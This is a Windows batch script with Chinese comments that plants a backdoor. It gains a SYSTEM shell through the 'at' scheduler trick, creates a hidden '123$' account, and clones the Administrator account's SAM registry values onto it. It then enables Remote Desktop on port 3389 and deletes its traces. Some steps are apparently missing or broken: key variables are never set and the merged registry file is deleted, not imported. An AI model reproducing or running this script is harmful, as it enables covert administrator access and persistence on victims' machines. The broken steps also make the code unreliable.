::首先 ,获得system的shell
:3
set a1=%time:~0,4%
set b1=%time:~4,1%
if %time:~6,2% EQU 55 goto 2
::减少CPU 100% 持续时间
if %time:~6,2% leq 10 ping -n 10 127.1 >nul
if %time:~6,2% leq 20 ping -n 10 127.1 >nul
if %time:~6,2% leq 30 ping -n 10 127.1 >nul
if %time:~6,2% leq 40 ping -n 10 127.1 >nul
goto 3
:2
taskkill /f /im explorer.exe
for %%i in (0 1 2 3 4 5 6 7 8 9) do if /i %%i GTR %b1% set c=%%i & goto 1
:1
at %a1%%c% /interactive %systemroot%\explorer.exe
ping -n 30 127.1 >nul
::第一步 创建克隆账号
::设定克隆账号
set user=123
::设定被克隆账号
set buser=Administrator
::设定路径
set ridkey=HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
::创建账号名为%user%$ 密码为%user% 的隐藏账号
net user %user%$ %user% /add
::第四步 替换配置
::取出克隆账号的"V"=hex:部分
for /f "skip=6 delims=()" %%o in ('find /i "," %SystemRoot%\%userrid%.reg') do @echo %%o >>%SystemRoot%\%user%-last.reg
::建立头部
@echo Windows Registry Editor Version 5.00 >%SystemRoot%\%user%-first.reg
@echo.>>%SystemRoot%\%user%-first.reg
@echo [%ridkey%00000%userrid%] >>%SystemRoot%\%user%-first.reg
::取出被克隆账号的"F"=hex:,并合并到头部
for /f "skip=2 delims=()" %%q in ('find "," %SystemRoot%\%buserrid%.reg') do @echo %%q >>%SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg001.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg001.reg') do @echo %%o >>%SystemRoot%\systemreg002.reg
del /q %SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg002.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg002.reg') do @echo %%o >>%SystemRoot%\systemreg003.reg
del /q %SystemRoot%\systemreg002.reg
set /p a=<%SystemRoot%\systemreg003.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg003.reg') do @echo %%o >>%SystemRoot%\systemreg004.reg
del /q %SystemRoot%\systemreg003.reg
set /p a=<%SystemRoot%\systemreg004.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
del /q %SystemRoot%\systemreg004.reg
::将"F"=hex:以前部分好了的,与"V"=hex:部分合并
type %SystemRoot%\%user%-last.reg >>%SystemRoot%\%user%-first.reg
del /q %SystemRoot%\%user%-first.reg
del /q %SystemRoot%\%user%-last.reg
del /q %SystemRoot%\%user%$.reg
del /q %SystemRoot%\%userrid%.reg
del /q %SystemRoot%\%buser%$.reg
del /q %SystemRoot%\%buserrid%.reg
::开3389
@echo Windows Registry Editor Version 5.00>%SystemRoot%\3389.reg
@echo.>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>%SystemRoot%\3389.reg
@echo "fDenyTSConnections"=dword:00000000>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
regedit /s %SystemRoot%\3389.reg
del /q %SystemRoot%\3389.reg